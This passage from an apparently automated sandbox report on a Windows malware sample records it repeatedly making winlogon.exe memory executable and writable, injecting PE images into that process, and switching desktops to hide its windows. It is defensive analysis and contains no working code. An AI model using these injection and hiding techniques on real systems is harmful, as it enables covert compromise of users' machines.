Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D240000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D241000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D256000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D259000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D25B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D260000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D261000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D276000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D279000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D27B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D280000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D281000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D296000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D299000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D29B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2B9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2BB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2D9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2DB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2F9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D2FB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D300000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D301000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D316000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D319000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D31B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D320000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D321000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D336000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D339000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D33B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D340000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D341000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D356000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D359000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D35B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D360000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D361000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D376000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D379000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D37B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D380000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D381000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D396000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D399000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D39B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3A0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3B9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3BB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3C0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3D9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3DB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3E0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3F9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D3FB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D400000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D401000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D416000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D419000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D41B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D420000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D421000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D436000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D439000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D43B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D440000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D441000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D456000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D459000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D45B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D460000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D461000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D476000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D479000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D47B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D480000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D481000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D496000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D499000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D49B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4BB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4DB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4FB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D500000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D501000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D516000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D519000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D51B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D520000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D521000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D536000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D539000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D53B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D540000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D541000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D556000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D559000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D55B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D560000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D561000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D576000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D579000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D57B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D580000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D581000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D596000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D599000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D59B000 protect: page execute and read and writeJump to behavior
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Code function: 0_2_0040BFE7 OpenWindowStationA, SetProcessWindowStation, OpenDesktopA, SetThreadDesktop, CloseDesktop, CloseWindowStation | 0_2_0040BFE7
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C940000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C960000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C980000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9E0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA00000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA20000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA40000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA60000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA80000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAA0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAC0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAE0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CB00000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CB20000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CB40000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CB60000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CB80000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CBA0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CBC0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CBE0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CC00000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CC20000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CC40000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CC60000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CC80000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CCA0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CCC0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CCE0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CD00000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CD20000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CD40000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CD60000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CD80000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CDA0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CDC0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CDE0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CE00000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CE20000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CE40000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CE60000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CE80000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CEA0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CEC0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CEE0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CF00000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CF20000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CF40000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CF60000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CF80000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CFA0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CFC0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CFE0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D000000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D020000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D040000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D060000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D080000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D0A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D0C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D0E0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D100000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D120000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D140000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D160000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D180000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D1A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D1C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D1E0000 value starts with: 4D5A
